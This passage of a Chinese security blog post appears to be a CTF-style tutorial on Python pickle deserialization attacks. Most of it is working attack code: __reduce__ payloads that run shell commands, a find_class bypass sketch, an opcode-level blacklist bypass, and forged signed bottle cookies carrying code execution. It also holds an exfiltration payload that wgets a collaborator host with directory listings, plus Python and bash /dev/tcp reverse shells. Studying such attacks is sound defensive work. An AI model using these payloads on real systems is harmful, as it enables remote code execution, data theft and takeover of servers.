class="hljs-keyword">return</span> (os.popen, (<span class="hljs-string">&#x27;id&#x27;</span>,))  <br>payload = pickle.dumps(Exploit())  <br>pickle.loads(payload)<br><br><span class="hljs-keyword">import</span> pickle, builtins  <br><span class="hljs-keyword">class</span> <span class="hljs-title class_">Exploit</span>:  <br>	<span class="hljs-keyword">def</span> <span class="hljs-title function_">__reduce__</span>(<span class="hljs-params">self</span>):  <br>		<span class="hljs-comment"># getattr(builtins, &#x27;eval&#x27;)(&quot;__import__(&#x27;os&#x27;).system(&#x27;id&#x27;)&quot;)  </span><br>		<span class="hljs-keyword">return</span> (<span class="hljs-built_in">getattr</span>(builtins, <span class="hljs-string">&#x27;eval&#x27;</span>), (<span class="hljs-string">&quot;__import__(&#x27;os&#x27;).system(&#x27;id&#x27;)&quot;</span>,))  <br>payload = pickle.dumps(Exploit())  <br>pickle.loads(payload)<br></code></pre></td></tr></table></figure>

<h6 id="跳过fine-class检查"><a href="#跳过fine-class检查" class="headerlink" title="跳过fine_class检查"></a>跳过fine_class检查</h6><ul>
<li>RestrictedUnpickler通过重写<code>find_class()</code>禁止导入模块，但PVM中并非所有操作码都调用<code>find_class</code></li>
<li>根据官方文档，<code>find_class()</code>在处理全局对象时被触发（<code>GLOBAL/c</code>、协议4中的<code>STACK_GLOBAL/\x93</code>、协议2及以上中的<code>INST/i</code>、<code>OBJ/o</code>等会调用该方法）</li>
<li>如果攻击者构造不使用这些操作码（如尽量不使用<code>c/i/\x93</code>），就可绕过<code>find_class</code></li>
<li>例如，可以利用对象自身的属性或特殊方法来间接获得所需函数，无需再触发导入。通过绕过全局导入的操作码序列，可不触发find_class()检查，从而在受限环境中获取eval等函数<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> pickle  <br>  <br><span class="hljs-keyword">class</span> <span class="hljs-title class_">Exploit</span>:  <br><span class="hljs-keyword">def</span> <span class="hljs-title function_">__reduce__</span>(<span class="hljs-params">self</span>):  <br><span class="hljs-comment"># 不直接 import，也不直接 GLOBAL  </span><br><span class="hljs-comment"># 用现有对象的 __class__.__base__.__subclasses__() 拿到 builtins 的 eval  </span><br>builtins_eval = ().__class__.__base__.__subclasses__()[<span class="hljs-number">138</span>]  <span class="hljs-comment"># 假设138是catch_warnings类  </span><br><span class="hljs-comment"># 这里要遍历找到builtins模块再找eval  </span><br><span class="hljs-keyword">return</span> (builtins_eval, ())  <br>  <br><span class="hljs-comment"># 注意：这个是思路示例，实际要找到路径对应的类索引  </span><br>payload = pickle.dumps(Exploit())<br></code></pre></td></tr></table></figure></li>
</ul>
<h6 id="无回显外带"><a href="#无回显外带" class="headerlink" title="无回显外带"></a>无回显外带</h6><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> pickle  <br><span class="hljs-keyword">import</span> os  <br><span class="hljs-keyword">import</span> base64  <br><span class="hljs-keyword">class</span> <span class="hljs-title class_">Evil</span>:  <br>	<span class="hljs-keyword">def</span> <span class="hljs-title function_">__reduce__</span>(<span class="hljs-params">self</span>):  <br>		<span class="hljs-keyword">return</span> (os.system, (<span class="hljs-string">&#x27;wget tvs9lnb4c9choqoskqogia002r8iwbk0.oastify.com/`ls | tr &quot;\n&quot; &quot;_&quot;`&#x27;</span>,))  <br>  <span class="hljs-comment"># 由于外带的内容中如果存在换行的情况，会导致wget 命令无法正确解析域名，因此可以用上面的方法列出所有文件</span><br>payload = pickle.dumps(Evil())  <br><span class="hljs-built_in">print</span>(base64.b64encode(payload))<br><br><span class="hljs-keyword">import</span> pickle<br><span class="hljs-keyword">import</span> time<br><span class="hljs-keyword">import</span> binascii<br><span class="hljs-keyword">import</span> os<br><br><span class="hljs-keyword">class</span> <span class="hljs-title class_">Exploit</span>:<br>    <span class="hljs-keyword">def</span> <span class="hljs-title function_">__reduce__</span>(<span class="hljs-params">self</span>):<br>        <span class="hljs-keyword">return</span> (os.system, (<span class="hljs-string">&#x27;&#x27;&#x27;python3 -c &quot;import os</span><br><span class="hljs-string">import socket</span><br><span class="hljs-string">import subprocess</span><br><span class="hljs-string">s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)</span><br><span class="hljs-string">s.connect((&#x27;&lt;Your IP&gt;&#x27;, 2333))</span><br><span class="hljs-string">os.dup2(s.fileno(), 0)</span><br><span class="hljs-string">os.dup2(s.fileno(), 1)</span><br><span class="hljs-string">os.dup2(s.fileno(), 2)</span><br><span class="hljs-string">subprocess.call([&#x27;/bin/sh&#x27;, &#x27;-i&#x27;])&quot;&#x27;&#x27;&#x27;</span>,))<br><span class="hljs-comment"># -c:用python3来执行后面字符串形式的命令，这是一种无需创建.py文件即可快速执行python代码的方式</span><br><span class="hljs-comment"># import subprocess:该模块用于创建进程，这里用来启动一个shell</span><br><span class="hljs-comment"># socket.AF_INET:表示使用IPV4地址族</span><br><span class="hljs-comment"># socket.SOCK_STREAM:表示使用TCP协议</span><br><span class="hljs-comment"># s.fileno():获取socket连接的文件描述符</span><br><span class="hljs-comment"># os.dup2(s.fileno(),num):把该进程的文件描述符重定向到socket连接</span><br><span class="hljs-comment"># subprocess.call():执行一个外部命令</span><br><br><br>payload = pickle.dumps(Exploit())<br>hex_token = binascii.hexlify(payload).decode()<br><span class="hljs-comment"># decode():将字节串 bytes对象 解码为 str对象，这两个对象不能混合操作</span><br><span class="hljs-built_in">print</span>(hex_token)<br><span class="hljs-built_in">print</span>(payload)<br><br>obj = pickle.loads(payload)<br><br></code></pre></td></tr></table></figure>

<h3 id="bottle-request里的反序列化"><a href="#bottle-request里的反序列化" class="headerlink" title="bottle.request里的反序列化"></a>bottle.request里的反序列化</h3><h4 id="get-cookie"><a href="#get-cookie" class="headerlink" title="get_cookie()"></a>get_cookie()</h4><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">def</span> <span class="hljs-title function_">get_cookie</span>(<span class="hljs-params">self, key, default=<span class="hljs-literal">None</span>, secret=<span class="hljs-literal">None</span>, digestmod=hashlib.sha256</span>):<br>        <span class="hljs-string">&quot;&quot;&quot; Return the content of a cookie. To read a `Signed Cookie`, the</span><br><span class="hljs-string">            `secret` must match the one used to create the cookie (see</span><br><span class="hljs-string">            :meth:`BaseResponse.set_cookie`). If anything goes wrong (missing</span><br><span class="hljs-string">            cookie or wrong signature), return a default value. &quot;&quot;&quot;</span><br>        value = <span class="hljs-variable language_">self</span>.cookies.get(key) <span class="hljs-comment"># 从cookie中获得指定键名的cookie值</span><br>        <span class="hljs-keyword">if</span> secret: <span class="hljs-comment"># 如果提供了secret，则要进行签名验证来确保cookie的完整性和安全性</span><br>            <span class="hljs-comment"># See BaseResponse.set_cookie for details on signed cookies.</span><br>            <span class="hljs-keyword">if</span> value <span class="hljs-keyword">and</span> value.startswith(<span class="hljs-string">&#x27;!&#x27;</span>) <span class="hljs-keyword">and</span> <span class="hljs-string">&#x27;?&#x27;</span> <span class="hljs-keyword">in</span> value:<br>	            <span class="hljs-comment"># 检查value存在，并且是否以!开头，?是用来分割签名（sig）和消息（msg）的标识</span><br>                sig, msg = <span class="hljs-built_in">map</span>(tob, value[<span class="hljs-number">1</span>:].split(<span class="hljs-string">&#x27;?&#x27;</span>, <span class="hljs-number">1</span>))<br>                <span class="hljs-comment"># 跳过!，根据?分割取出签名和消息，用tob函数将字符串转换为字节</span><br>                <span class="hljs-built_in">hash</span> = hmac.new(tob(secret), msg, digestmod=digestmod).digest()<span class="hljs-comment"># 使用secret,msg生成一个哈希签名用来验证cookie是否被篡改，这里同样使用了HMAC，并利用指定的digestmod算法（默认为hashlib.sha56）来计算哈希</span><br>                <span class="hljs-keyword">if</span> _lscmp(sig, base64.b64encode(<span class="hljs-built_in">hash</span>)):<span class="hljs-comment"># 使用_lscmp函数进行签名比较，验证是否被篡改</span><br>                    dst = pickle.loads(base64.b64decode(msg))<br>                    <span class="hljs-comment"># 签名通过则对消息进行解码，然后反序列化为原始数据结构</span><br>                    <span class="hljs-keyword">if</span> dst <span class="hljs-keyword">and</span> dst[<span class="hljs-number">0</span>] == key:<br>	                    <span class="hljs-comment"># 确保解码得到的对象dst不是空，并且其第一个元素与请求的key匹配。如果匹配，则返回该cookie的值dst[1]</span><br>                        <span class="hljs-keyword">return</span> dst[<span class="hljs-number">1</span>]<br>            <span class="hljs-keyword">return</span> default<br>        <span class="hljs-keyword">return</span> value <span class="hljs-keyword">or</span> default<br></code></pre></td></tr></table></figure>
<ul>
<li>很明显是利用cookie通过<code>get_cookie</code>的验证抵达反序列化，然后用<code>__reduce__</code>执行代码</li>
<li>这个函数其实没有验证消息是否是想要的，只是单纯用<strong>密钥</strong>验证是否正确（即通过间接方式验证<em><strong>密钥是否正确</strong></em>）</li>
</ul>
<h5 id="set-cookie"><a href="#set-cookie" class="headerlink" title="set_cookie()"></a>set_cookie()</h5><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">def</span> <span class="hljs-title function_">set_cookie</span>(<span class="hljs-params">self, name, value, secret=<span class="hljs-literal">None</span>, digestmod=hashlib.sha256, **options</span>):<br>        <span class="hljs-keyword">if</span> <span class="hljs-keyword">not</span> <span class="hljs-variable language_">self</span>._cookies:<br>            <span class="hljs-variable language_">self</span>._cookies = SimpleCookie()<br>            <span class="hljs-comment"># 检查cookie是否存在，不存在则初始化一个SimpleCookie对象</span><br><br>        <span class="hljs-comment"># Monkey-patch Cookie lib to support &#x27;SameSite&#x27; parameter</span><br>        <span class="hljs-comment"># https://tools.ietf.org/html/draft-west-first-party-cookies-07#section-4.1</span><br>        <span class="hljs-keyword">if</span> py &lt; (<span class="hljs-number">3</span>, <span class="hljs-number">8</span>, <span class="hljs-number">0</span>):<br>            Morsel._reserved.setdefault(<span class="hljs-string">&#x27;samesite&#x27;</span>, <span class="hljs-string">&#x27;SameSite&#x27;</span>)<br>            <span class="hljs-comment"># 兼容旧版本python</span><br><br>        <span class="hljs-keyword">if</span> secret:<br>            <span class="hljs-keyword">if</span> <span class="hljs-keyword">not</span> <span class="hljs-built_in">isinstance</span>(value, basestring):<br>                depr(<span class="hljs-number">0</span>, <span class="hljs-number">13</span>, <span class="hljs-string">&quot;Pickling of arbitrary objects into cookies is &quot;</span><br>                            <span class="hljs-string">&quot;deprecated.&quot;</span>, <span class="hljs-string">&quot;Only store strings in cookies. &quot;</span><br>                            <span class="hljs-string">&quot;JSON strings are fine, too.&quot;</span>)<span class="hljs-comment"># 不是字符串则发出警告，建议不要将任意对象序列化到cookie中</span><br>            encoded = base64.b64encode(pickle.dumps([name, value], -<span class="hljs-number">1</span>))<span class="hljs-comment"># 将cookie的名称和值打包成一个列表，然后进行序列化后base64加密</span><br>            sig = base64.b64encode(hmac.new(tob(secret), encoded,<br>digestmod=digestmod).digest())<span class="hljs-comment"># 生成签名</span><br>            value = touni(tob(<span class="hljs-string">&#x27;!&#x27;</span>) + sig + tob(<span class="hljs-string">&#x27;?&#x27;</span>) + encoded)<br>            <span class="hljs-comment"># 加上!和?标识，标识这是一个签名cookie</span><br>	        <span class="hljs-comment"># 看到这就行了</span><br></code></pre></td></tr></table></figure>
<h5 id="利用思路"><a href="#利用思路" class="headerlink" title="利用思路"></a>利用思路</h5><ul>
<li>很明显是要用<code>set_cookie</code>来伪造一个cookie，然后在里面放入想执行的代码<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> bottle <span class="hljs-keyword">import</span> Bottle,request,response,run,route<br><span class="hljs-keyword">class</span> <span class="hljs-title class_">cmd</span>():<br>	<span class="hljs-keyword">def</span> <span class="hljs-title function_">__reduce__</span>(<span class="hljs-params">self</span>):<br>		<span class="hljs-keyword">return</span> (<span class="hljs-built_in">eval</span>,(<span class="hljs-string">&quot;__import__(&#x27;os&#x27;).popen(&#x27;ls&#x27;).read()&quot;</span>,))<br>c = cmd()<br><span class="hljs-comment"># session = &#123;&quot;name&quot;:c&#125;</span><br>response.set_cookie(<span class="hljs-string">&quot;name&quot;</span>,c,secret=<span class="hljs-string">&quot;&quot;</span>)<br><span class="hljs-built_in">print</span>(response._cookies)<br><span class="hljs-string">&#x27;&#x27;&#x27;</span><br><span class="hljs-string">运行报错：</span><br><span class="hljs-string">Traceback (most recent call last):</span><br><span class="hljs-string">  File &quot;&quot;, line 7, in &lt;module&gt;</span><br><span class="hljs-string">    response.set_cookie(&quot;name&quot;,c,secret=&quot;secret&quot;)</span><br><span class="hljs-string">  File &quot;E:\python\python3.10.0\lib\site-packages\bottle.py&quot;, line 1869, in set_cookie</span><br><span class="hljs-string">    encoded = base64.b64encode(pickle.dumps([name, value], -1))</span><br><span class="hljs-string">_pickle.PicklingError: second item of the tuple returned by __reduce__ must be a tuple</span><br><span class="hljs-string">&#x27;&#x27;&#x27;</span><br><span class="hljs-comment"># 无语了我去，犯弱智了，__reduce__第二个返回的第二个元素（元组形式）后面忘加&#x27;,&#x27;了</span><br></code></pre></td></tr></table></figure></li>
</ul>
<h6 id="cookie-encode"><a href="#cookie-encode" class="headerlink" title="cookie_encode()"></a>cookie_encode()</h6><ul>
<li>除了用<code>set_cookie</code>来间接获取加密后的cookie，还可以使用<code>bottle</code>里专门用来构造<code>cookie</code>的<code>cookie_encode</code>方法<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> bottle <span class="hljs-keyword">import</span> cookie_encode<br>secret = <span class="hljs-string">&quot;secret&quot;</span><br><span class="hljs-keyword">class</span> <span class="hljs-title class_">cmd</span>():<br>	<span class="hljs-keyword">def</span> <span class="hljs-title function_">__reduce__</span>(<span class="hljs-params">self</span>):<br>		<span class="hljs-keyword">return</span> (<span class="hljs-built_in">eval</span>,(<span class="hljs-string">&quot;&quot;&quot;__import__(&#x27;os&#x27;).system(&#x27;dir&gt;test.txt&#x27;)&quot;&quot;&quot;</span>,))<br>c = cmd()<br>exp = cookie_encode((<span class="hljs-string">&#x27;session&#x27;</span>,&#123;<span class="hljs-string">&quot;name&quot;</span>:[c]&#125;),secret)<br><span class="hljs-comment"># exp = cookie_encode((&#x27;name&#x27;,&#123;&quot;name&quot;:[c]&#125;),secret)</span><br><span class="hljs-built_in">print</span>(exp)<br><br></code></pre></td></tr></table></figure></li>
</ul>
<h3 id="黑名单R字符与绕过"><a href="#黑名单R字符与绕过" class="headerlink" title="黑名单R字符与绕过"></a>黑名单R字符与绕过</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs python">blacklist = [<span class="hljs-string">b&#x27;R&#x27;</span>, <span class="hljs-string">b&#x27;secret&#x27;</span>, <span class="hljs-string">b&#x27;eval&#x27;</span>, <span class="hljs-string">b&#x27;file&#x27;</span>, <span class="hljs-string">b&#x27;compile&#x27;</span>, <span class="hljs-string">b&#x27;open&#x27;</span>, <span class="hljs-string">b&#x27;os.popen&#x27;</span>]<br><br></code></pre></td></tr></table></figure>
<ul>
<li>如果我们构造的<strong>恶意pickle</strong>是利用<code>__reduce__</code>，则payload中会出现R指令，即一个R字符，这就是过滤的逻辑</li>
<li>可以使用i或者o指令编写的opcode（operration code：操作码）进行绕过<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment"># R</span><br><span class="hljs-string">b&#x27;&#x27;&#x27;cos</span><br><span class="hljs-string">system</span><br><span class="hljs-string">(S&#x27;whoami&#x27;</span><br><span class="hljs-string">tR.</span><br><span class="hljs-string">&#x27;&#x27;&#x27;</span><br><span class="hljs-comment"># i</span><br><span class="hljs-string">b&#x27;&#x27;&#x27;(S&#x27;whoami&#x27;</span><br><span class="hljs-string">ios</span><br><span class="hljs-string">system</span><br><span class="hljs-string">.&#x27;&#x27;&#x27;</span><br><span class="hljs-comment"># o</span><br><span class="hljs-string">b&#x27;&#x27;&#x27;(cos</span><br><span class="hljs-string">system</span><br><span class="hljs-string">S&#x27;whoami&#x27;</span><br><span class="hljs-string">o.&#x27;&#x27;&#x27;</span><br><br><span class="hljs-string">b&#x27;&#x27;&#x27;(S&#x27;bash -c &quot;bash -i &gt;&amp; /dev/tcp/IP/7777 0&gt;&amp;1&quot;&#x27;</span><br><span class="hljs-string">ios</span><br><span class="hljs-string">system</span><br><span class="hljs-string">.&#x27;&#x27;&#x27;</span><br></code></pre></td></tr></table></figure></li>
<li><em><strong>值得注意的是</strong></em>：由于我们这里使用的不是<em><strong>R指令</strong></em>，所以我们其实并不是通过调用<code>__reduce__</code>来发起攻击</li>
<li>更详细分析的见[[0-v0]]</li>
</ul>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/" class="print-no-link">#反序列化</a>
      
        <a href="/tags/HMAC/" class="print-no-link">#HMAC</a>
      
        <a href="/tags/python/" class="print-no-link">#python</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>pickle反序列化-1</div>
      <div>http://example.com/2025/10/28/pickle反序列化-1/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>Author</div>
          <div>John Doe</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>Posted on</div>
          <div>October 28, 2025</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>Licensed under</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - Attribution">
                    <i class="iconfont icon-cc-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2025/10/28/JWT/" title="JWT">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">JWT</span>
                        <span class="visible-mobile">Previous</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2025/10/28/phar%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/" title="phar反序列化">
                        <span class="hidden-mobile">phar反序列化</span>
                        <span class="visible-mobile">Next</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>Table of Contents</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Search</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">Keyword</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">Blog works best with JavaScript enabled</div>
  </noscript>
</body>
</html>
